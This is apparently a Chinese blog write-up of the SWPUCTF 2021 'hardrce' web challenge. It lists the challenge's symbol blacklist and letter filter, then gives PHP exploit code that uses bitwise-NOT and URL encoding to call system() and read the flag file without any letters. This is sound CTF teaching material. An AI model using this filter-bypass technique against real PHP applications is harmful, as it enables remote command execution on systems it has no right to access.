🐈
🐈

【SWPUCTF 2021 新生赛】hardrce

 included in Web · 2024做题
 About 100 words One minute 
Contents

[SWPUCTF 2021 新生赛]hardrce

思路

  • GET传参给网页(参数是wllm)
  • 过滤1【一些符号】:$blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\’,];`
  • 过滤2【字母】:preg_match(’/[a-zA-Z]/is’,$wllm)
  • 因此考虑无字母绕过中的取反绕过

EXP

取反绕过核心代码

1
2
3
4
5
6
7
8

<?php
echo urlencode(~'system');
echo "\n";
echo urlencode(~'cat /flllllaaaaaaggggggg');
?>

# 构造system(cat /flllllaaaaaaggggggg);
# 其中把system和cat /flllllaaaaaaggggggg替换

总结

  • 无字母RCE——取反绕过
Updated on 2024-07-01 
CC BY-NC-SA 4.0
Read Markdown
Web做题RCE
Back | Home
0%